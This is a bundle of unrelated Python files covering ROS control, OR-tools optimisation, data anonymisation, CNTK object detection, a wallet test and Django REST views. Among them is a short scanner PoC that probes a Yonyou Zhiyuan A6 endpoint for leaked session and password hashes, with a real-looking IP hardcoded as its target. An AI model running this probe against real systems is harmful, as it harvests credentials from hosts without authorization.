            # Explicit loaders are required because APP_DIRS is False.
            "loaders": (
                "admin_tools.template_loaders.Loader",
                "django.template.loaders.filesystem.Loader",
                "django.template.loaders.app_directories.Loader",
            ),
        },
    },
]
|
#!/usr/bin/env python
import math
import rospy
from sensor_msgs.msg import Joy
from pan_tilt_msg.msg import PanTiltCmd
delta_value = 2  # degrees moved per button press
pan_tilt_yaw = 0.0  # current yaw command, degrees
pan_tilt_pitch = 0.0  # current pitch command, degrees
# Set in main(); None (idiomatic sentinel, was 0) until the publisher exists.
publisher = None
def joy_callback(data):
    """Translate joystick button presses into an incremental pan/tilt command.

    Button mapping by index: 0 -> pitch down by delta, 1 -> yaw down by delta,
    2 -> pitch up by delta, 3 -> yaw up by delta, 5 -> reset both axes.
    NOTE(review): the original's physical-button comments (Y/B/A/X/RB) could
    not be verified from this file alone.
    """
    global pan_tilt_yaw, pan_tilt_pitch
    if data.buttons[0] == 1:
        pan_tilt_pitch -= delta_value
    if data.buttons[1] == 1:
        pan_tilt_yaw -= delta_value
    if data.buttons[2] == 1:
        pan_tilt_pitch += delta_value
    if data.buttons[3] == 1:
        pan_tilt_yaw += delta_value
    if data.buttons[5] == 1:
        pan_tilt_pitch = 0
        pan_tilt_yaw = 0
    # Clamp both axes to the [-60, 60] degree range (was four if-statements
    # with stray semicolons).
    pan_tilt_pitch = max(-60, min(60, pan_tilt_pitch))
    pan_tilt_yaw = max(-60, min(60, pan_tilt_yaw))
    command = PanTiltCmd()
    command.speed = 20.0
    command.yaw = pan_tilt_yaw
    command.pitch = pan_tilt_pitch
    publisher.publish(command)
def main():
    """Initialise the ROS node, create the command publisher, subscribe to
    joystick input and hand control to the ROS event loop."""
    global publisher
    rospy.init_node("pan_tilt_control_node")
    # BUGFIX: create the publisher BEFORE subscribing — the original
    # registered the subscriber first, so a joy message arriving immediately
    # would hit joy_callback while `publisher` was still the unset sentinel.
    publisher = rospy.Publisher('/pan_tilt_driver_node/pan_tilt_cmd', PanTiltCmd, queue_size=10)
    rospy.Subscriber("joy", Joy, joy_callback)
    rospy.loginfo("PanTilt Control Start")
    rospy.spin()


if __name__ == '__main__':
    main()
import unittest
from katas.kyu_8.hex_to_decimal import hex_to_dec
class HexToDecimalTestCase(unittest.TestCase):
    """Unit tests for the kyu-8 hex_to_dec kata solution."""

    def test_equal_1(self):
        # A plain decimal digit maps to itself.
        result = hex_to_dec("1")
        self.assertEqual(result, 1)

    def test_equal_2(self):
        # A lower-case hex letter.
        result = hex_to_dec("a")
        self.assertEqual(result, 10)

    def test_equal_3(self):
        # A multi-digit value: 0x10 == 16.
        result = hex_to_dec("10")
        self.assertEqual(result, 16)
|
# Copyright 2021 Hakan Kjellerstrand hakank@gmail.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Volsay problem in OR-tools CP-SAT Solver.
From the OPL model volsay.mod
Using arrays.
This is a port of my old LP model volsay2.py
This model was created by Hakan Kjellerstrand (hakank@gmail.com)
Also see my other OR-tools models: http://www.hakank.org/or_tools/
"""
from __future__ import print_function
from ortools.sat.python import cp_model as cp
import math, sys
# from cp_sat_utils import *
def main():
    """Build and solve the Volsay production-planning problem with CP-SAT."""
    model = cp.CpModel()

    # data
    num_products = 2
    Gas, Chloride = 0, 1
    products = ['Gas', 'Chloride']

    # decision variables: units produced of each product
    production = [model.NewIntVar(0, 100000, 'production[%i]' % i)
                  for i in range(num_products)]

    # resource constraints
    model.Add(production[Gas] + production[Chloride] <= 50)
    model.Add(3 * production[Gas] + 4 * production[Chloride] <= 180)

    # objective: maximize total profit
    model.Maximize(40 * production[Gas] + 50 * production[Chloride])

    # solve and report
    solver = cp.CpSolver()
    status = solver.Solve(model)
    if status == cp.OPTIMAL:
        print('objective = ', solver.ObjectiveValue())
        for i in range(num_products):
            print(products[i], '=', solver.Value(production[i]), end=' ')
        print()
        print()
        print("NumConflicts:", solver.NumConflicts())
        print("NumBranches:", solver.NumBranches())
        print("WallTime:", solver.WallTime())
        print()


if __name__ == '__main__':
    main()
|
import random
from datetime import date, datetime, timedelta
from decimal import Decimal
from enum import Enum, auto
from typing import TypeVar, Union
from faker import Faker
# T: any anonymizable scalar field type.
T = TypeVar("T", float, int, Decimal, bytes, bool, str, date, datetime)
# S: the types accepted by mock().
S = TypeVar("S", str, date, datetime)
# U: the numeric/temporal types accepted by vary().
U = TypeVar("U", int, float, Decimal, date, datetime)
# Shared Faker instance used by every mock generator.
FAKER = Faker()
class Strategies(Enum):
    """All supported anonymization strategies.

    Each member maps to an implementation function via STRAT_TO_FUNC.
    (The bare strings after the members are existing member documentation.)
    """

    SUPPRESS = auto()
    """Suppresses the input field by returning a static anonymous string. Only works with string fields."""
    PARTIAL_SUPPRESS = auto()
    """
    Returns a partially suppressed string based on the given input pattern.
    The input pattern can consit of any character, but '*'s will overwrite
    the character in the input. The pattern and value must always be the same
    length.
    >> ex. the value "012 345 6789" with pattern "*** *** XXXX" returns "*** *** 6789"
    """
    MOCK = auto()
    """
    Returns a new value given the requested mocking type. Currently, only
    address, full name, and datetime, and date mocks are available. Fields must
    be the correct type in order to be mockable with the given method.
    """
    VARY = auto()
    """
    Returns a new value, with variance picked from a Gaussian distribution with a mean
    of the current value and a given standard deviation.
    If the value is a date or datetime, the variance is in days.
    """
class MockTypes(Enum):
    """
    All supported mock types.
    Each type is a valid provider in the Faker library <https://faker.rtfd.org/en/master/providers.html>.
    """

    ADDRESS = auto()
    """Generates single-line full addresses in the United States."""
    DATETIME = auto()
    """Generates dates or datetimes within any UNIX epoch."""
    NAME = auto()
    """Generates random English full names."""
def suppress(v: str, *args) -> str:
    """Replace the whole value with a fixed anonymous placeholder string."""
    if isinstance(v, str):
        return "<CONFIDENTIAL>"
    raise TypeError("Supression only works on strings.")
def partial_suppress(v: str, *args: str) -> str:
    """
    Mask a string using a pattern of equal length: wherever the pattern holds
    a '*', the output is '*'; everywhere else the original character is kept.

    >> ex. the value "012 345 6789" with pattern "*** *** XXXX" returns "*** *** 6789"
    """
    if not isinstance(v, str):
        raise TypeError("Partial suppression only works with strings.")
    if len(args) != 1 or not isinstance(args[0], str):
        raise TypeError("Partial suppression requires a string pattern argument.")
    pattern = args[0]
    if len(v) != len(pattern):
        raise ValueError("Mismatching value and pattern lengths.")
    masked = []
    for original_char, pattern_char in zip(v, pattern):
        masked.append("*" if pattern_char == "*" else original_char)
    return "".join(masked)
def mock(v: S, *args) -> S:
    """
    Replace the value with a fake of the requested MockTypes kind. The value's
    runtime type must match the mock being requested (str for address/name,
    datetime for DATETIME, date otherwise).
    """
    if not isinstance(v, (str, date, datetime)):
        raise TypeError("Mock anonymization only works with supported fields.")
    if len(args) != 1 or not isinstance(args[0], MockTypes):
        raise TypeError("Mock anonymization must be given a specific mock type.")
    mock_type = args[0]
    if mock_type is MockTypes.ADDRESS:
        if not isinstance(v, str):
            raise TypeError("Address mocking can only be done with text fields.")
        return FAKER.address()  # type: ignore
    if mock_type is MockTypes.NAME:
        if not isinstance(v, str):
            raise TypeError("Name mocking can only be done with text fields.")
        return FAKER.name()  # type: ignore
    if mock_type is MockTypes.DATETIME:
        if not isinstance(v, datetime):
            raise TypeError("Datetime mocking can only be done with datetime fields.")
        return FAKER.date_time()  # type: ignore
    # Fallback branch for plain dates (MockTypes has no dedicated DATE member).
    if not isinstance(v, date):
        raise TypeError("Date mocking can only be done with datetime fields.")
    return FAKER.date_time().date()  # type: ignore
def vary(v: U, *args: Union[float, int]) -> U:
    """
    Return a new value drawn from a Gaussian centred on the current value
    with the supplied standard deviation. For date/datetime values the
    deviation is measured in days.
    """
    if not isinstance(v, (int, float, Decimal, date, datetime)):
        raise TypeError("Variance anonymization only works with variable fields.")
    if len(args) != 1:
        raise TypeError("A numeric variance must be given in your anonymity mapping.")
    if not isinstance(args[0], (float, int)):
        raise TypeError(
            "You must supply a float or integer variance for numeric fields."
        )
    sigma = args[0]
    # Temporal values: shift by a (possibly fractional) number of days.
    if isinstance(v, (date, datetime)):
        return v + timedelta(days=random.gauss(0, sigma))
    # Numeric values: sample around the value, then cast back to its own type.
    return type(v)(random.gauss(float(v), sigma))
# Dispatch table mapping each anonymization strategy to its implementation.
STRAT_TO_FUNC = {
    Strategies.SUPPRESS: suppress,
    Strategies.PARTIAL_SUPPRESS: partial_suppress,
    Strategies.MOCK: mock,
    Strategies.VARY: vary,
}
|
import cv2
import json
import sys
import numpy as np
from os import path
# CNTK imports
from cntk import load_model
from cntk import placeholder
from cntk.logging.graph import find_by_name, get_node_outputs
from cntk.ops import combine
from cntk.ops.sequence import input_variable
from cntk.ops.functions import CloneMethod
# constants used for ROI generation:
# ROI generation
roi_minDimRel = 0.04  # minimum ROI side length, relative to roi_maxImgDim
roi_maxDimRel = 0.4   # maximum ROI side length, relative to roi_maxImgDim
roi_minNrPixelsRel = 2 * roi_minDimRel * roi_minDimRel      # minimum ROI area (relative)
roi_maxNrPixelsRel = 0.33 * roi_maxDimRel * roi_maxDimRel   # maximum ROI area (relative)
roi_maxAspectRatio = 4.0 # maximum aspect ratio of a ROI, vertically and horizontally
roi_maxImgDim = 200 # image size used for ROI generation
ss_scale = 100 # selective search ROIs: parameter controlling cluster size for segmentation
ss_sigma = 1.2 # selective search ROIs: width of gaussian kernel for segmentation
ss_minSize = 20 # selective search ROIs: minimum component size for segmentation
grid_nrScales = 7 # uniform grid ROIs: number of iterations from largest possible ROI to smaller ROIs
grid_aspectRatios = [1.0, 2.0, 0.5] # uniform grid ROIs: aspect ratio of ROIs
# absolute counterparts of the relative limits above, in pixels of the
# roi_maxImgDim-sized image used during ROI generation
roi_minDim = roi_minDimRel * roi_maxImgDim
roi_maxDim = roi_maxDimRel * roi_maxImgDim
roi_minNrPixels = roi_minNrPixelsRel * roi_maxImgDim * roi_maxImgDim
roi_maxNrPixels = roi_maxNrPixelsRel * roi_maxImgDim * roi_maxImgDim
nms_threshold = 0.1  # overlap threshold for non-maxima suppression of detections
def get_classes_description(model_file_path, classes_count):
    """Return a mapping of class names to class indices for a model.

    Looks for a ``model.json`` file in the model's directory and returns
    its ``"classes"`` entry.  When no description file exists, synthesizes
    default names of the form ``class_<i>`` for each of *classes_count*
    classes.
    """
    desc_path = path.join(path.dirname(model_file_path), 'model.json')
    if not path.exists(desc_path):
        # No description file next to the model: fall back to placeholders.
        return {"class_%d" % i: i for i in range(classes_count)}
    with open(desc_path) as handle:
        model_desc = json.loads(handle.read())
    return model_desc["classes"]
class FRCNNDetector:
    """Fast R-CNN object detector wrapping a trained CNTK model.

    Generates region proposals (selective search and/or a uniform grid),
    feeds them together with the resized+padded image through the network,
    and post-processes the raw outputs (softmax + non-maxima suppression)
    into bounding boxes with class labels.
    """

    def __init__(self, model_path,
                 pad_value = 114, cntk_scripts_path=r"c:\local\cntk\Examples\Image\Detection\FastRCNN",
                 use_selective_search_rois = True,
                 use_grid_rois = True):
        """Store configuration and import the CNTK FastRCNN helper scripts.

        model_path: path to the trained CNTK model file.
        pad_value: grayscale value used to pad images to the network size.
        cntk_scripts_path: directory containing cntk_helpers.py.
        use_selective_search_rois / use_grid_rois: which proposal methods
        to combine when generating candidate regions.
        """
        self.__model_path = model_path
        self.__cntk_scripts_path = cntk_scripts_path
        self.__pad_value = pad_value
        self.__pad_value_rgb = [pad_value, pad_value, pad_value]
        self.__use_selective_search_rois = use_selective_search_rois
        self.__use_grid_rois = use_grid_rois
        self.__model = None
        self.__is_python_model = False
        self.__model_warm = False
        self.__grid_rois_cache = {}
        self.labels_count = 0
        # a cache to use ROIs after filter in case we only use the grid method
        self.__rois_only_grid_cache = {}
        # cntk_helpers lives in the CNTK examples folder, not on sys.path;
        # the imports are made global so other methods can use them.
        sys.path.append(self.__cntk_scripts_path)
        global imArrayWidthHeight, getSelectiveSearchRois, imresizeMaxDim
        from cntk_helpers import imArrayWidthHeight, getSelectiveSearchRois, imresizeMaxDim
        global getGridRois, filterRois, roiTransformPadScaleParams, roiTransformPadScale
        from cntk_helpers import getGridRois, filterRois, roiTransformPadScaleParams, roiTransformPadScale
        global softmax2D, applyNonMaximaSuppression
        from cntk_helpers import softmax2D, applyNonMaximaSuppression

    def ensure_model_is_loaded(self):
        """Lazily load the model on first use."""
        if not self.__model:
            self.load_model()

    def warm_up(self):
        """Run one dummy evaluation so later calls to detect() are fast."""
        self.ensure_model_is_loaded()
        if self.__model_warm:
            return
        # a dummy variable for labels that will be given as an input to the network but will be ignored
        # NOTE(review): dummy_labels is built but never passed to eval() -- confirm it is needed.
        dummy_labels = np.zeros((self.__nr_rois, self.labels_count))
        dummy_rois = np.zeros((self.__nr_rois, 4))
        dummy_image = np.ones((3, self.__resize_width, self.__resize_height)) * 255.0
        # prepare the arguments
        arguments = {
            self.__model.arguments[self.__args_indices["features"]]: [dummy_image],
            self.__model.arguments[self.__args_indices["rois"]]: [dummy_rois]
        }
        self.__model.eval(arguments)
        self.__model_warm = True

    def load_model(self):
        """Load the CNTK model and prepare it for evaluation.

        Handles both Python-API-trained models (2 arguments: features, rois)
        and BrainScript-trained models (3+ arguments), cloning the latter so
        that only the evaluation subgraph remains.

        Raises:
            Exception: if a model has already been loaded.
        """
        if self.__model:
            raise Exception("Model already loaded")
        trained_frcnn_model = load_model(self.__model_path)

        # Python-API models expose only (features, rois); BrainScript models
        # also expose a roiLabels argument, hence the argument-count probe.
        self.__is_python_model = True if (len(trained_frcnn_model.arguments) < 3) else False
        if (self.__is_python_model):
            self.__args_indices = {"features" : 0, "rois" : 1}
            self.__nr_rois = trained_frcnn_model.arguments[self.__args_indices["rois"]].shape[0]
            self.__resize_width = trained_frcnn_model.arguments[self.__args_indices["features"]].shape[1]
            self.__resize_height = trained_frcnn_model.arguments[self.__args_indices["features"]].shape[2]
            self.labels_count = trained_frcnn_model.arguments[self.__args_indices["rois"]].shape[1]
            self.__model = trained_frcnn_model
        else:
            # cache indices of the model arguments
            args_indices = {}
            for i,arg in enumerate(trained_frcnn_model.arguments):
                args_indices[arg.name] = i

            self.__nr_rois = trained_frcnn_model.arguments[args_indices["rois"]].shape[0]
            self.__resize_width = trained_frcnn_model.arguments[args_indices["features"]].shape[1]
            self.__resize_height = trained_frcnn_model.arguments[args_indices["features"]].shape[2]
            self.labels_count = trained_frcnn_model.arguments[args_indices["roiLabels"]].shape[1]

            # next, we adjust the clone the model and create input nodes just for the features (image) and ROIs
            # This will make sure that only the calculations that are needed for evaluating images are performed
            # during test time
            #
            # find the original features and rois input nodes
            features_node = find_by_name(trained_frcnn_model, "features")
            rois_node = find_by_name(trained_frcnn_model, "rois")

            # find the output "z" node
            z_node = find_by_name(trained_frcnn_model, 'z')

            # define new input nodes for the features (image) and rois
            image_input = input_variable(features_node.shape, name='features')
            roi_input = input_variable(rois_node.shape, name='rois')

            # Clone the desired layers with fixed weights and place holder for the new input nodes
            cloned_nodes = combine([z_node.owner]).clone(
                CloneMethod.freeze,
                {features_node: placeholder(name='features'), rois_node: placeholder(name='rois')})

            # apply the cloned nodes to the input nodes to obtain the model for evaluation
            self.__model = cloned_nodes(image_input, roi_input)

            # cache the indices of the input nodes
            self.__args_indices = {}

            for i,arg in enumerate(self.__model.arguments):
                self.__args_indices[arg.name] = i

    def resize_and_pad(self, img):
        """Resize *img* preserving aspect ratio, then pad to the network size.

        Returns a tuple of (padded BGR image, CHW float32 array ready to be
        fed to the model).
        """
        self.ensure_model_is_loaded()
        # port of the c++ code from CNTK: https://github.com/Microsoft/CNTK/blob/f686879b654285d06d75c69ee266e9d4b7b87bc4/Source/Readers/ImageReader/ImageTransformers.cpp#L316
        img_width = len(img[0])
        img_height = len(img)

        # scale the longer side to the network input dimension
        scale_w = img_width > img_height
        target_w = self.__resize_width
        target_h = self.__resize_height

        if scale_w:
            target_h = int(np.round(img_height * float(self.__resize_width) / float(img_width)))
        else:
            target_w = int(np.round(img_width * float(self.__resize_height) / float(img_height)))

        resized = cv2.resize(img, (target_w, target_h), 0, 0, interpolation=cv2.INTER_NEAREST)

        # center the resized image inside a padded canvas
        top = int(max(0, np.round((self.__resize_height - target_h) / 2)))
        left = int(max(0, np.round((self.__resize_width - target_w) / 2)))
        bottom = self.__resize_height - top - target_h
        right = self.__resize_width - left - target_w
        resized_with_pad = cv2.copyMakeBorder(resized, top, bottom, left, right,
                                              cv2.BORDER_CONSTANT, value=self.__pad_value_rgb)

        # tranpose(2,0,1) converts the image to the HWC format which CNTK accepts
        model_arg_rep = np.ascontiguousarray(np.array(resized_with_pad, dtype=np.float32).transpose(2, 0, 1))

        return resized_with_pad, model_arg_rep

    def get_rois_for_image(self, img):
        """Generate, filter and normalize candidate ROIs for *img*.

        Returns (rois, original_rois) where `rois` is an (nr_rois, 4) array of
        [x, y, w, h] values relative to the padded network input, padded or
        truncated to exactly self.__nr_rois entries, and `original_rois` holds
        the corresponding [x, y, x2, y2] rectangles in original image pixels.
        """
        self.ensure_model_is_loaded()
        # get rois
        if self.__use_selective_search_rois:
            rects, scaled_img, scale = getSelectiveSearchRois(img, ss_scale, ss_sigma, ss_minSize,
                                                              roi_maxImgDim)  # interpolation=cv2.INTER_AREA
        else:
            rects = []
            scaled_img, scale = imresizeMaxDim(img, roi_maxImgDim, boUpscale=True, interpolation=cv2.INTER_AREA)
        imgWidth, imgHeight = imArrayWidthHeight(scaled_img)

        # grid-only proposals depend solely on the scaled image size, so the
        # final result can be served from a cache keyed by that size
        if not self.__use_selective_search_rois:
            if (imgWidth, imgHeight) in self.__rois_only_grid_cache:
                return self.__rois_only_grid_cache[(imgWidth, imgHeight)]

        # add grid rois
        if self.__use_grid_rois:
            if (imgWidth, imgHeight) in self.__grid_rois_cache:
                rectsGrid = self.__grid_rois_cache[(imgWidth, imgHeight)]
            else:
                rectsGrid = getGridRois(imgWidth, imgHeight, grid_nrScales, grid_aspectRatios)
                self.__grid_rois_cache[(imgWidth, imgHeight)] = rectsGrid
            rects += rectsGrid

        # run filter
        rois = filterRois(rects, imgWidth, imgHeight, roi_minNrPixels, roi_maxNrPixels, roi_minDim, roi_maxDim,
                          roi_maxAspectRatio)
        if len(rois) == 0:  # make sure at least one roi returned per image
            rois = [[5, 5, imgWidth - 5, imgHeight - 5]]

        # scale up to original size and save to disk
        # note: each rectangle is in original image format with [x,y,x2,y2]
        original_rois = np.int32(np.array(rois) / scale)

        img_width = len(img[0])
        img_height = len(img)

        # all rois need to be scaled + padded to cntk input image size
        targetw, targeth, w_offset, h_offset, scale = roiTransformPadScaleParams(img_width, img_height,
                                                                                 self.__resize_width,
                                                                                 self.__resize_height)

        rois = []
        for original_roi in original_rois:
            x, y, x2, y2 = roiTransformPadScale(original_roi, w_offset, h_offset, scale)
            # convert to [x, y, w, h] relative to the padded network input
            xrel = float(x) / (1.0 * targetw)
            yrel = float(y) / (1.0 * targeth)
            wrel = float(x2 - x) / (1.0 * targetw)
            hrel = float(y2 - y) / (1.0 * targeth)
            rois.append([xrel, yrel, wrel, hrel])

        # pad rois if needed:
        if len(rois) < self.__nr_rois:
            rois += [[0, 0, 0, 0]] * (self.__nr_rois - len(rois))
        elif len(rois) > self.__nr_rois:
            rois = rois[:self.__nr_rois]

        if not self.__use_selective_search_rois:
            self.__rois_only_grid_cache[(imgWidth, imgHeight)] = (np.array(rois), original_rois)

        return np.array(rois), original_rois

    def detect(self, img):
        """Detect objects in *img* (BGR numpy array).

        Returns (rois_predictions, rois_predictions_labels): the surviving
        non-background bounding boxes in original image coordinates and the
        corresponding class label indices.
        """
        self.ensure_model_is_loaded()
        self.warm_up()

        resized_img, img_model_arg = self.resize_and_pad(img)
        test_rois, original_rois = self.get_rois_for_image(img)
        # index of the first padding ROI; everything beyond it is filler
        roi_padding_index = len(original_rois)

        # a dummy variable for labels that will be given as an input to the network but will be ignored
        # NOTE(review): dummy_labels is built but never passed to eval() -- confirm it is needed.
        dummy_labels = np.zeros((self.__nr_rois, self.labels_count))

        # prepare the arguments
        arguments = {
            self.__model.arguments[self.__args_indices["features"]]: [img_model_arg],
            self.__model.arguments[self.__args_indices["rois"]]: [test_rois]
        }

        # run it through the model
        output = self.__model.eval(arguments)
        self.__model_warm = True

        # take just the relevant part and cast to float64 to prevent overflow when doing softmax
        if (self.__is_python_model):
            rois_values = output[0][:roi_padding_index].astype(np.float64)
        else:
            rois_values = output[0][0][:roi_padding_index].astype(np.float64)

        # get the prediction for each roi by taking the index with the maximal value in each row
        rois_labels_predictions = np.argmax(rois_values, axis=1)

        # calculate the probabilities using softmax
        rois_probs = softmax2D(rois_values)

        non_padded_rois = test_rois[:roi_padding_index]

        max_probs = np.amax(rois_probs, axis=1).tolist()

        rois_prediction_indices = applyNonMaximaSuppression(nms_threshold, rois_labels_predictions, max_probs,
                                                            non_padded_rois)

        original_rois_predictions = original_rois[rois_prediction_indices]
        rois_predictions_labels = rois_labels_predictions[rois_prediction_indices]

        # filter out backgrond label (label index 0)
        non_background_indices = rois_predictions_labels > 0
        rois_predictions_labels = rois_predictions_labels[non_background_indices]
        rois_predictions = original_rois_predictions[non_background_indices]

        return rois_predictions, rois_predictions_labels
if __name__ == "__main__":
    import argparse
    import os

    # Command-line driver: run the detector over one image or a directory of
    # .jpg images, writing annotated images and/or a JSON detection report.
    parser = argparse.ArgumentParser(description='FRCNN Detector')
    parser.add_argument('--input', type=str, metavar='<path>',
                        help='Path to image file or to a directory containing image in jpg format', required=True)
    parser.add_argument('--output', type=str, metavar='<directory path>',
                        help='Path to output directory', required=False)
    parser.add_argument('--model', type=str, metavar='<file path>',
                        help='Path to model file',
                        required=True)
    parser.add_argument('--cntk-path', type=str, metavar='<dir path>',
                        help='Path to the directory in which CNTK is installed, e.g. c:\\local\\cntk',
                        required=False)
    parser.add_argument('--json-output', type=str, metavar='<file path>',
                        help='Path to output JSON file', required=False)
    args = parser.parse_args()

    input_path = args.input
    output_path = args.output
    json_output_path = args.json_output
    model_file_path = args.model

    # default Windows CNTK installation directory
    cntk_path = args.cntk_path if args.cntk_path else "C:\\local\\cntk"
    cntk_scripts_path = path.join(cntk_path, r"Examples/Image/Detection/FastRCNN")

    if (output_path is None and json_output_path is None):
        parser.error("No directory output path or json output path specified")

    if (output_path is not None) and not os.path.exists(output_path):
        os.makedirs(output_path)

    # collect the images to process
    if os.path.isdir(input_path):
        import glob
        file_paths = glob.glob(os.path.join(input_path, '*.jpg'))
    else:
        file_paths = [input_path]

    detector = FRCNNDetector(model_file_path, use_selective_search_rois=False,
                             cntk_scripts_path=cntk_scripts_path)
    detector.load_model()

    if json_output_path is not None:
        model_classes = get_classes_description(model_file_path, detector.labels_count)
        json_output_obj = {"classes": model_classes,
                           "frames": {}}

    print("Number of images to process: %d" % len(file_paths))
    for counter, file_path in enumerate(file_paths):
        print("Read file in path:", file_path)
        img = cv2.imread(file_path)
        rects, labels = detector.detect(img)
        print("Processed image %d" % (counter + 1))
        if output_path is not None:
            # image mode: draw the detected boxes and save an annotated copy
            img_cpy = img.copy()
            print("Running FRCNN detection on", file_path)
            print("%d regions were detected" % len(rects))
            for rect, label in zip(rects, labels):
                x1, y1, x2, y2 = rect
                cv2.rectangle(img_cpy, (x1, y1), (x2, y2), (0, 255, 0), 2)
            output_file_path = os.path.join(output_path, os.path.basename(file_path))
            cv2.imwrite(output_file_path, img_cpy)
        elif json_output_path is not None:
            # JSON mode: record each detection as a region entry
            # NOTE(review): when both --output and --json-output are given,
            # only annotated images are produced and the JSON "frames" stay
            # empty -- confirm whether both outputs should be filled.
            image_base_name = path.basename(file_path)
            regions_list = []
            json_output_obj["frames"][image_base_name] = {"regions": regions_list}
            for rect, label in zip(rects, labels):
                regions_list.append({
                    "x1": int(rect[0]),
                    "y1": int(rect[1]),
                    "x2": int(rect[2]),
                    "y2": int(rect[3]),
                    "class": int(label)
                })

    if json_output_path is not None:
        with open(json_output_path, "wt") as handle:
            handle.write(json.dumps(json_output_obj, indent=2))
|
import json, logging, pytest, time, os
from cryptoadvance.specter.specter import Specter
from cryptoadvance.specter.managers.wallet_manager import WalletManager
from cryptoadvance.specter.wallet import Wallet
from conftest import instantiate_bitcoind_controller
logger = logging.getLogger(__name__)
def test_check_utxo_and_amounts(
    specter_regtest_configured: Specter, funded_hot_wallet_1: Wallet
):
    """Freezing UTXOs is reflected in full_utxo and the amount_* properties.

    Assumes the funded_hot_wallet_1 fixture provides 10 confirmed plus 2
    unconfirmed UTXOs totalling 15 (10 confirmed / 5 unconfirmed), and that
    the two first-listed UTXOs sum to 2 -- TODO confirm against the fixture.
    """
    wl = funded_hot_wallet_1
    # Let's first prepare some locked txids
    unspent_list_orig = wl.rpc.listunspent()  # to be able to ref in stable way
    wl.check_utxo()
    # 10 transactions + 2 unconfirmed
    assert len(wl.full_utxo) == 12
    # none are locked
    assert len([tx for tx in wl.full_utxo if tx["locked"]]) == 0
    # Freeze 2 UTXO
    # ["txid:vout", "txid:vout"]
    wl.toggle_freeze_utxo(
        [
            f"{unspent_list_orig[0]['txid']}:{unspent_list_orig[0]['vout']}",
            f"{unspent_list_orig[1]['txid']}:{unspent_list_orig[1]['vout']}",
        ]
    )
    # still 12 utxo with 2 unconfirmed
    wl.check_utxo()
    assert len(wl.full_utxo) == 12
    # 2 are locked
    assert len([tx for tx in wl.full_utxo if tx["locked"]]) == 2
    # Check total amount
    assert wl.amount_total == 15
    # Check confirmed amount
    assert wl.amount_confirmed == 10
    # Check unconfirmed amount
    assert wl.amount_unconfirmed == 5
    # Check frozen amount
    assert wl.amount_frozen == 2
    # Check available amount
    assert wl.amount_available == 13  # total - frozen
    # Check immature amount
    # Mining one block to our own address yields an immature coinbase whose
    # value depends on the regtest halving schedule, hence the alternatives.
    address = wl.getnewaddress()
    wl.rpc.generatetoaddress(1, address)
    wl.update_balance()
    assert (
        round(wl.amount_immature, 1) == 50
        or round(wl.amount_immature, 1) == 25
        or round(wl.amount_immature, 1) == 12.5
        or round(wl.amount_immature, 2) == 6.25
    )
    # amount_locked_unsigned is tested in test_wallet_createpsbt (in test_managers_wallet.py)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# PoC: Yonyou Zhiyuan A6 collaborative office system account/password disclosure
import re
def assign(service, arg):
    """Accept the target only when the service matches this PoC's plugin."""
    matched = service == 'yongyou_zhiyuan_a6'
    if matched:
        return (True, arg)
    return None
def audit(arg):
    """Probe the session-list JSP and report a leak of MD5-like hashes.

    Fetches the endpoint and, when the response is HTTP 200 and contains at
    least one 32-character hex string (a session/password hash), raises a
    security warning for the vulnerable URL.
    """
    payload = "yyoa/ext/https/getSessionList.jsp?cmd=getAll"
    hash_pattern = re.compile(r'[a-fA-F0-9]{32,32}')
    code, _, res, _, _ = curl.curl2(arg + payload)
    leaked_hashes = hash_pattern.findall(res)
    if leaked_hashes and code == 200:
        security_warning(arg + payload)
if __name__ == '__main__':
    # Local test harness: `dummy` supplies the curl/security_warning stubs.
    from dummy import *
    audit(assign('yongyou_zhiyuan_a6','http://222.175.187.147:8081/')[1])
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.db.models import QuerySet
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from rest_framework import status
from cuisines.models import Cuisine
from cuisines.serializers import CuisineSerializer
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
from rest_framework.views import APIView
class JSONResponse(HttpResponse):
    """An HttpResponse whose body is the JSON rendering of *data*.

    Convenience wrapper used by the cuisine views to return serializer
    output with the correct content type.
    """

    def __init__(self, data, **kwargs):
        content = JSONRenderer().render(data)
        kwargs['content_type'] = 'application/json'
        # zero-argument super() -- the legacy two-argument form is Python 2 era
        super().__init__(content, **kwargs)
class CuisineListView(APIView):
    """List and create endpoints for Cuisine objects."""

    @csrf_exempt
    @swagger_auto_schema(
        operation_description="Gets a list of Cuisine objects.",
        responses={
            200: CuisineSerializer(many=True)
        },
        tags=['Cuisine'],
    )
    def get(self, request, *args, **kwargs):
        """Return all Cuisine objects as a JSON array."""
        objects: QuerySet[Cuisine] = Cuisine.objects.all()
        serializer = CuisineSerializer(objects, many=True)
        return JSONResponse(serializer.data)

    @csrf_exempt
    @swagger_auto_schema(
        operation_description="Creates a new Cuisine entry with a given name",
        # query_serializer=CuisineSerializer,
        request_body=openapi.Schema(
            type=openapi.TYPE_OBJECT,
            required=['name'],
            properties={
                'name': openapi.Schema(
                    description='The cuisines unique name.',
                    type=openapi.TYPE_STRING
                )
            },
        ),
        responses={
            200: CuisineSerializer(many=False),
            400: """
                The required request parameters are not met.
            """,
        },
        tags=['Cuisine'],
    )
    def post(self, request):
        """Create a Cuisine from the JSON body; 201 on success, 400 on invalid data."""
        data = JSONParser().parse(request)
        serializer = CuisineSerializer(data=data)
        if serializer.is_valid():
            serializer.save()
            return JSONResponse(
                serializer.data,
                status=status.HTTP_201_CREATED
            )
        return JSONResponse(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )
class CuisineDetailView(APIView):
    """Retrieve, update (full/partial) and delete endpoints for one Cuisine."""

    @csrf_exempt
    @swagger_auto_schema(
        operation_description="Gets a Cuisine object for a given id.",
        responses={
            200: CuisineSerializer(many=False),
            404: """
                The object could not be retrieved, since it doesn't exist.
            """,
        },
        tags=['Cuisine'],
    )
    def get(self, request, pk):
        """Return the Cuisine with primary key *pk*, or 404."""
        try:
            data = Cuisine.objects.get(pk=pk)
        except Cuisine.DoesNotExist:
            return HttpResponse(
                status=status.HTTP_404_NOT_FOUND
            )
        serializer = CuisineSerializer(data)
